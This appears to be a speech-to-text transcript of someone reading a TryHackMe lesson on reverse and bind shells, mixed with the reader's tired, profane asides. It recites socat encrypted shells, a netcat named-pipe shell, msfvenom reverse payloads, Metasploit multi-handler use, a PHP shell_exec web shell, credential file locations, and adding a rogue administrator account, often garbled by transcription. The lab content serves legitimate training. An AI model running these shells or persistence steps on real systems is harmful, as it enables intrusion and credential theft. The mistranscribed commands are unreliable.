Tired. Always tired.
One of the many great things about SOCAT is that it's capable of creating encrypted shells, both bind and reverse. Why would we want to do this? Encrypted shells cannot be spied on unless you have the decryption key, and are often able to bypass an IPS as a result. We covered how to create basic shells in the previous task, so that syntax will not be covered again here. Suffice to say that any time TCP was used as part of a command, this should be replaced with OpenSO when working with encrypted shells.
I'm tired. I'm cold. I don't know you do.
Replaced with OpenSO when working with encrypted shells. We'll cover a few examples at the end of the task, but first let's talk about certificates. We first need to generate a certificate in order to use encrypted shells. This is easiest to do on our TryHackMe machine. OpenSO write nuki RSA:2048 nodes key out shell dot key x 509 days 362 out shell
Jesus, I did that before. I've had to do that before.
48-bit RSA key with matching cert file, self-signed, and valid for just under a year.
Yeah, I did that.
When you run this command, it will ask you to fill in information about the certificate. This can be left blank or filled randomly. We then need to merge the two created files into a single PEM file, catshell.keyshell.crt greater than shell.pem. Now, when we set up our reverse shell listener, we use SOCAT OpenSO listen port cert equals shell.pem, verify equals 0. This sets up an OpenSO listener using our generated certificate. Verify equals 0 tells the connection to not bother trying to validate that our certificate has been properly signed by a recognized authority. Please note that the certificate must be used on whichever device is listening. To connect back, we would use SOCAT OpenSO local IP greater than local port verify equals 0 exec:/bin/bash. The same technique would apply for a bind shell target. SOCAT OpenSO listen port cert equals shell.pem, verify equals 0 exec:/cmd.exe, pipes attacker. SOCAT OpenSO target IP greater than target port verify equals 0. Again, note that even for a Windows target, the certificate must be used with the listener, so copying the PEM file across for a bind shell is required. The following image shows an OpenSO reverse shell from a Linux target. As usual, the target is on the right, and the attacker is on the left.
I need to actually perform it to learn
This
it.
technique will also work with the special, Linux-only TTY shell covered in the previous task. Figuring out the syntax for this will be the challenge for this task. Feel free to use the Linux practice box, deployable at the end of the room, to experiment if you're struggling to obtain the answer.
Hmm. Fuck, I don't know. Doesn't fucking give me enough information. It just tells me a bunch of gibberish shit. That's what I fucking did. File TT1. I knew I needed something. Ten, 5. Raw. Oh, fuck that up. What's the head on that? No, I don't fucking care.
We'll soon be looking at generating payloads with Freedom, but before we do that, let's take a look at some common payloads using the tools we've already covered. A previous task mentioned that we'd be looking at some ways to use Netcat as a listener for a bind shell, so we'll start with that. In some versions of Netcat, including the NC.exe Windows version included with Kali at /user/share/windows resources/binaries, and the version used in Kali itself, Netcat Traditional, there is a E option which allows you to execute a process on connection. For example, as a listener, nclvnp port t/bid/batch connecting to the above listener with Netcat would result in a bind shell on the target. Equally, for a reverse shell, Connecting back with NC local IP greater than port T/bin/batch would result in a reverse shell on the target.
Okay.
However, this is not included in most versions of Netcat as it is widely seen to be very insecure. Funny that, huh? On Windows where a static binary is nearly always required anyway, this technique will work perfectly. On Linux, however, we would instead use this code to create a listener for a bind shell. FIFO/TMP/F NCLVNP port less than /TMP/F/bin/sh greater than /TMP/F2 greater than N1 RM/TMP/F. The following paragraph is the technical explanation for this command. It's slightly above the level of this root.
No, it's not Netcat.
The following paragraph is the technical explanation for this command. It's slightly above the level of this room, so don't worry if it doesn't make much sense for now. The command itself is what matters. The command first creates a named pipe /TMP/F. It then starts a Netcat listener and connects the input of the listener to the output of the named pipe. The output of the Netcat listener, i.e. the commands we send, then gets piped directly into SH, sending the SDIR output stream into SDOUT, and sending SDOUT itself into the input of the named pipe, thus completing the circle.
Oh, I don't want to break it down. Jesus Christ, it just does. There's no way this is a 45-minute list.
Venom, the one-stop shop for all things payload related. Part of the Metasploit framework, Venom is used to generate code for primarily reverse and bind shells. It is used extensively in lower-level exploit development to generate hexadecimal shellcode when developing something like a buffer overflow exploit. However, it can also be used to generate payloads in various formats. For example, exe, asks, war, pi. It's this latter function that we will be making use of in this room. There is more to teach about Venom than could ever be fit into a single room, let alone a single task, so the following information will be a brief introduction to the concepts that will prove useful for this room. The standard syntax for Venom is as follows. Venom NP payload options, for example, to generate the Windows x64 reverse shell in an exe format, we could use Venom NP Windows /x64/shell/reverse_tcpf exeo lost equals listen IP greater than the port equals listen port.
Oh my God, there's so much.
Here we are using a payload and 4 options. F format specifies the output format. In this case, that is an executable. exe of file the output location and file name for the generated payload. Lost equals IP. Greater than specifies the IP to connect back to. When using TryHackMe, this will be your ton0 IP address. If you cannot load the link, then you are not connected to the VPN. Port equals port the port on the local machine to connect back to. This can be anything between 0 and 65,000.
That could be your tone.
1,535 that isn't already in use. However, ports below 1,024 are restricted and require listener running with root privileges. Stage versus stageless. Before we go any further, there are another 2 concepts which must be introduced: staged reverse shell payloads and stageless reverse shell payloads. Staged payloads are sent in 2 parts. The first part is called the stager. This is a piece of code which is executed directly on the server itself. It connects back to a waiting listener, but doesn't actually contain any reverse shell code by itself. Instead, it connects to the listener and uses the connection to load the real payload, executing it directly and preventing it from touching the disk where it could be caught by traditional antivirus solutions. Thus, the payload is split into 2 parts: a small initial stager, then the bulkier reverse shell code which is downloaded when the stager is activated. Staged payloads require a special listener, usually the Metasploit multi-handler, which will be covered in the next task. Stageless payloads are more common. These are what we've been using up until now. They are entirely self-contained in that there is one piece of code which, when executed, sends a shell back immediately from a waiting listener. Stageless payloads tend to be easier to use and catch. However, they are also bulkier and are easier for an antivirus or intrusion detection program to discover and remove. Staged payloads are harder to use, but the initial stager is a lot shorter, and is sometimes missed by less effective antivirus software. Modern-day antivirus solutions will also make use of the anti-malware scan interface, AMSI, to detect the payload as it is loaded into memory by the stager, making staged payloads less effective than they would once have been in this area. Meterpreter on the subject of Metasploit. Another important thing to discuss is a Meterpreter shell. Meterpreter shells are Metasploit's own brand of fully featured shells. They are completely stable, making them a very good thing when working with Windows targets. They also have a lot of inbuilt functionality of their own, such as file uploads and downloads. If we want to use any of Metasploit's post-exploitation tools, then we need to use a Meterpreter shell. However, that is a topic for another time. The downside to Meterpreter shells is that they must be caught in Metasploit. Payload naming conventions and working within them, it's important to understand how the naming system works. The basic convention is as follows. OS greater than /arch/payload, for example, Linux /x86/shell_reverse_TCP. This will generate a stageless reverse shell for an x86 Linux target. The exception to this convention is Windows 32-bit targets. For these, the arch is not specified. For example, Windows/shell_reverse_TCP for a 64-bit Windows target. The arch would be specified as normal, x64. Let's break the payload section down a little further. In the above examples, the payload used was shell_reverse_TCP. This indicates that it was a stageless payload. How? Stageless payloads are denoted with underscores. The staged equivalent to this payload would be shell/reverse_TCP, as staged payloads are denoted with another //. This rule also applies to Meterpreter payloads. A Windows 64-bit stage Meterpreter payload would look like this. Windows/x64/Meterpreter/reverse_TCP. A Linux 32-bit stageless Meterpreter payload would look like this. Linux/x86/Meterpreter_reverse_TCP. Aside from the console man page, the other important thing to note when working with Mtfindom is Mtfindom list payloads that can be used to list all available payloads, which can then be piped into grep to search for a specific set of payloads. For example,
I'm not generating shit, Joe. I'm tired. What command would you generate? MSF. payload. Fuck. I'm so tired. Just fucking. Turbo reverse. I was halfway. I was almost there. Fuck. Oh my god, I'm so fucking tired of doing this. I just want to be done with this goddamn lesson. I'm not learning much from it because it's just throwing so much at me.
Multi-handler is a superb tool for catching reverse shells. It's essential if you want to use interpreter shells, and is the go-to when using staged payloads. Fortunately, it's relatively easy to use. Open Metasploit with console, type use multi-handler, and press enter. We are now primed to start a multi-handler session. Let's take a look at the available options using the options command. There are three options we need to set: payload, lost in port. These are all identical to the options we set when generating shellcode with NVM, a payload specific to our target, as well as a listening address and port with which we can receive a shell. Note that the lost must be specified here, as Metasploit will not listen on all network interfaces like Netcat or SOCAT will. It must be told a specific address to listen with. When using TryHackMe, this will be your ton0 address. We set these options with the following commands: set payload, set lost, listen address, settle port, listen port. We should now be ready to start the listener. Let's do this by using the exploit J command. This tells Metasploit to launch the module, running as a job in the background.
Okay. That's a stage payload. Okay, that makes more sense.
Notice that, because the multi-handler was originally backgrounded, we needed to use sessions 1 to foreground it again. This worked as it was the only session running. Had there been other sessions active, we would have needed to use sessions to see all active sessions, then use sessions number to select the appropriate session to foreground. This number would also have been displayed in the line where the shell was open. See command shell session 1 open.
Oh man. Exploit dash J. That's not right. It's too broad of a thing.
There are times when we encounter websites that allow us an opportunity to upload, in some way or another, an executable file. Ideally, we would use this opportunity to upload code that would activate a reverse or bind shell, but sometimes this is not possible. In these cases, we would instead upload a web shell. See the Upload Vulnerabilities room for a more extensive look at this concept. Web shell is a colloquial term for a script that runs inside a web server, usually in a language such as PHP or ASP, which executes code on the server. Essentially, commands are entered into a web page, either through a HTML form, or directly as arguments in the URL, which are then executed by the script, with the results returned and written to the page. This can be extremely useful if there are firewalls in place, or even just as a stepping stone into a fully fledged reverse or bind shell. As PHP is still the most common server-side scripting language, let's have a look at some simple code for this. In a very basic one-line format, less than PHP echo pre shell underscore exec dollar underscore get cmd, less than slash pre greater than this will take a get parameter in the URL and execute it on the system with shell underscore exec. Essentially, what this means is that any commands we enter in the URL after cmd equals will be executed on the system, be it Windows or Linux. The pre-elements are to ensure that the results are formatted correctly on the page. Let's see this in action.
Huh. My cat go. Cat's on. You have to warm me up. I'm cold, baby. Ow, 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 ow. Quit poking me.
Notice that when navigating the shell, we used a get parameter cmd with the command ifconfig, which correctly returned the network information of the box. In other words, by entering the ifconfig command, used to check the network interfaces on a Linux target, into the URL of our shell, it was executed on the system, with the results returned to us. This would work for any other command we chose to use, for example hoami, host name, large, etc. As mentioned previously. There are a variety of web shells available on Kali by default at /user/share/web shells, including the infamous Pendist Monkey PHP reverse shell, a full reversed shell written in PHP. Note that most generic, language-specific, for example PHP, reverse shells are written for Unix-based targets such as Linux web servers. They will not work on Windows by default. When the target is Windows, it is often easiest to obtain RC using a web shell, or by using TryHackMe to generate a reverse bind shell in the language of the server. With the former method, obtaining RC is often done with a URL encoded PowerShell reverse shell. This would be copied into the URL as the CMD argument. PowerShell %20 secret. Okay, we have a shell. Now what? We've covered lots of ways to generate, send and receive shells. The one thing that these all have in common is that they tend to be unstable and non-interactive. Even Unix-style shells, which are easier to stabilize, are not ideal. So, what can we do about this? On Linux, ideally we would be looking for opportunities to gain access to a user account. SSH keys stored at /home/user/.ssh are often an ideal way to do this. In CTF, it's also not infrequent to find credentials lying around somewhere on the box. Some exploits will also allow you to add your own account. In particular, something like dirtyc0w or writable /etc/shadow or /etc/pass would quickly give you SSH access to the machine, assuming SSH is open. On Windows, the options are often more limited. It's sometimes possible to find passwords for running services in the registry. VNC servers, for example, frequently leave passwords of the registry stored in plain text. Some versions of the FileZilla FTP server also leave credentials in an XML file at c:/program files/FileZilla server/FileZilla server.xml or c:/zamp/FileZilla server/FileZilla server.xml. These can be MD5 hashes or in plain text, depending on the version. Ideally on Windows you would obtain a shell running as the system user, or an administrator account running with high privileges. In such a situation it's possible to simply add your own account in the administrators group to the machine, then log in over RDP, Telnet, WIMES, SecSec, WinRM or any number of other methods, dependent on the services running on the box. The syntax for this is as follows. Net use a username password slash add net local group administrators username slash add. The important takeaway from this task. Reverse and bind shells are an essential technique for gaining remote code execution on a machine. However, they will never be as fully featured as a native shell. Ideally, we always want to escalate into using a normal method for accessing the machine, as this will invariably be easier to use for further exploitation of the target.
Port 22.
This room contained a lot of information, and gave you little opportunity to put it into practice throughout. The following two tasks contain virtual machines, one Ubuntu 18.04 server and one Windows server, each configured with a simple web server with which you can upload and activate shells. This is a sandbox environment, so there will be no filters to bypass. Login credentials and instructions for